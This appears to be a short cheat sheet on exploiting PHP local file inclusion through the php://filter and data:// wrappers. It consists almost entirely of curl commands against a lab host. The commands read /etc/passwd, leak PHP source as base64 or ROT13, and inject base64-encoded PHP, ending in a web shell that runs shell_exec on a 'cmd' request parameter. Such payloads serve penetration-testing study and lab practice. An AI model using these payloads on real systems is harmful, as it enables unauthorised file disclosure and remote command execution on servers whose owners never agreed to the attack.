PHP

PHP filter

The PHP filter wrapper is used in LFI to read the actual PHP page content. In typical cases, it is not possible to read a PHP file's content via LFI because PHP files get executed and never show the existing code. However, we can use the PHP filter to display the content of PHP files in other encoding formats such as base64 or ROT13.

curl http://example.labs/page.php?file=php://filter/resource=/etc/passwd

curl http://example.labs/page.php?file=php://filter/read=string.rot13/resource=/etc/passwd

curl http://example.labs/page.php?file=php://filter/convert.base64-encode/resource=/etc/passwd

PHP DATA

The PHP wrapper is used to include raw plain text or base64 encoded data. It is used to include images on the current page. It is being used in LFI exploit.

curl http://example.labs?menu.php?file=data:text/plain,hello word
curl http://example.labs?menu.php?file=data:text/plain,<?php echo shell_exec("id") ?>
curl http://example.labs?menu.php?file=data:text/plain,<?php echo shell_exec('id') ?>

echo "Hackerman" | base64 # SGFja2VybWFuCg==
curl http://example.labs/page.php?file=data://text/plain;base64,SGFja2VybWFuCg==

echo "<?php echo rand() ?>" | base64 # PD9waHAgZWNobyByYW5kKCkgPz4K
curl http://example.labs/page.php?file=data://text/plain;base64,PD9waHAgZWNobyByYW5kKCkgPz4K

echo "<pre><?php echo shell_exec('id') ?></pre>" | base64 # PHByZT48P3BocCBlY2hvIHNoZWxsX2V4ZWMoJ2lkJykgPz48L3ByZT4K
curl http://example.labs/page.php?file=data://text/plain;base64,PHByZT48P3BocCBlY2hvIHNoZWxsX2V4ZWMoJ2lkJykgPz48L3ByZT4K

echo '<?php echo shell_exec($_REQUEST["cmd"])?>' | base64  # PD9waHAgZWNobyBzaGVsbF9leGVjKCRfUkVRVUVTVFsiY21kIl0pPz4K
curl http://example.labs/page.php?file=data://text/plain;base64,PD9waHAgZWNobyBzaGVsbF9leGVjKCRfUkVRVUVTVFsiY21kIl0pPz4K
curl http://example.labs/page.php?file=data://text/plain;base64,PD9waHAgZWNobyBzaGVsbF9leGVjKCRfUkVRVUVTVFsiY21kIl0pPz4K&cmd=id